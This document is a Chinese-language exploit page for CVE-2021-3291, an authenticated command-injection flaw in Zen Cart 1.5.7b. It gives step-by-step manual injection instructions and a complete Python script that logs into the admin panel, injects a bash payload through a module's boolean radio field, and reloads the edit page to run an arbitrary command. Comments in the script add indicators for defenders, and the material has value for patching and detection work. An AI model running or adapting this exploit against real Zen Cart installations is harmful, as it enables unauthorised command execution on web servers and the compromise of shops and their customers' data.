
Zen Cart 1.5.7b 任意命令执行(CVE-2021-3291)

Zen Cart 1.5.7b 中,已登录的管理员可在模块编辑页面内,通过检查并修改 HTML 单选框(radiobox)元素的值来插入命令,从而执行任意命令。

  • 1-)以管理员身份登录
  • 2-)获取任何模块编辑页面
  • 3-)检查元素任何真实的单选框
  • 4-)将true更改为true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo id; //
  • 5-)点击更新
  • 6-)触发命令再次进入编辑页面

CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291

zencart_v157b_authenticated_rce_exploit.py:

#!/usr/bin/python3
import mechanize as mc
import sys
import re
from bs4 import BeautifulSoup as bs
import base64 as B

# Proof-of-concept flow for CVE-2021-3291 as written in this script: log in
# to the Zen Cart admin panel, list the "payment" module set, open the first
# module whose page shows an Edit button, resubmit its edit form with one
# boolean (True/False) option replaced by the injected string, then reload
# the edit page. The page text above describes reloading the edit page as
# the trigger step; what the server does with the stored value is not
# visible from here.
#
# Defender notes (grounded in the request pattern below):
#   * The only non-standard traffic is an admin session that POSTs to a
#     module "action=save" URL with a form value containing a closing quote,
#     "); echo", a backtick-wrapped /bin/bash invocation and a trailing "//"
#     (see the payload on the "Payload injected" line). A module
#     configuration value that contains quote/backtick/comment sequences is
#     the indicator to audit for; presumably it persists in the module's
#     configuration until it is overwritten — verify against the schema.
#   * Requests from this script carry the literal User-Agent "Chrome".
#   * Exploitation requires valid admin credentials (login form below), so
#     admin-credential hygiene and review of admin logins precede everything.
#   * Fixed versions are not stated on this page; see the CVE link above.

# Argument handling: four positional arguments. The base URL must end with
# "/" (enforced with assert, which is stripped under `python -O`); any
# failure here, including a missing argument, falls into the bare except.
# NOTE: the usage message is not an f-string, so "{sys.argv[0]}" is printed
# literally rather than expanded.
try:
    url: str = sys.argv[1]
    assert url[-1] == "/"
    username: str = sys.argv[2]
    password: str = sys.argv[3]
    com: str = sys.argv[4]  # command string interpolated into the payload below
except:
    print ("Usage: {sys.argv[0]} http://target.com/zencart/crackXXXXX/ username password command")
    exit(1)

# Module sets that the admin "modules" page can list; only index 0
# ("payment") is ever used (see `mod = moduls[0]` below).
moduls = ["payment","shipping","ordertotal","plugin_manager"] # default

# mechanize browser: robots.txt is ignored and a fixed User-Agent is sent.
br = mc.Browser()
br.set_handle_robots(False)
br.addheaders=[('User-agent','Chrome')]

br.open(url+"login.php")

# Admin login via the "loginForm" form. The response is kept in `send` but
# never inspected, so a failed login is not detected at this point.
br.select_form("loginForm")
br.form["admin_name"] = username
br.form["admin_pass"] = password
send = br.submit()

# Enumerate module links on the "payment" set page. The regex requires
# exactly 150 characters after `<a href="`, so shorter hrefs are not
# captured. Links are kept only if they name a module and are not the
# "remove" action; "&amp;" is unescaped back to "&".
mod = moduls[0]
adres = url+"index.php?cmd=modules&set="+mod
kaynak = br.open(adres).read()
adr = re.findall(b'<a href=".{150}', kaynak)
adr2: list[str] = []
for i in adr:
    if b"&amp;module=" in i and b"action=remove" not in i:
        adr2.append(i.split(b'<a href="')[1].split(b'"')[0].replace(b"&amp;",b"&").decode())

# Walk the module pages until one with an Edit button is found; that module's
# edit form is rebuilt by hand as a raw "name=value&..." body (no URL
# encoding is applied to the values) and POSTed to the save action.
for ek in adr2:
    kaynak = br.open(ek).read()
    if b"id=\"editButton\">Edit</a>" in kaynak:
        print (f"Target url: {ek}&action=edit")
        br.open(ek+"&action=edit")
        br.select_form("modules")
        form = br.forms()[0]
        liste: bytes = b""
        for con in form.controls:
            try:
                deger = br.form.find_control(name=con.name).value
                boyut = len(deger)
                # List-valued controls (radio/select) whose current value is
                # empty, "True" or "False" are the injection point; every
                # other control is copied through with its current value.
                if type(deger) == list:
                    if boyut == 0 or deger[0] == "True" or deger[0] == "False":
                        liste += con.name.encode() + b"=" +  f"True','F'); echo `/bin/bash -c '{com}'`; //".encode() + b"&"
                        print("Payload injected")
                    else:
                        liste +=  con.name.encode() + b"=" + deger[0].encode() + b"&"
                else:
                    liste +=  con.name.encode() + b"=" + deger.encode() + b"&"
            except:
                # Controls that cannot be looked up or have no len() are
                # silently dropped from the body.
                pass
        # Trailing "&" is stripped before sending.
        print (liste[:-1])
        #br.set_proxies({"http": "localhost:5555"})
        ac = br.open(ek+"&action=save", liste[:-1])
        # The edit page is reloaded three times after saving; the responses
        # (`ac`, `son`) are never read, so success is not verified by the
        # script itself. Only the first editable module is processed.
        son = br.open(ek+"&action=edit")
        son = br.open(ek+"&action=edit")
        son = br.open(ek+"&action=edit")
        break

from:https://github.com/MucahitSaratar/zencart_auth_rce_poc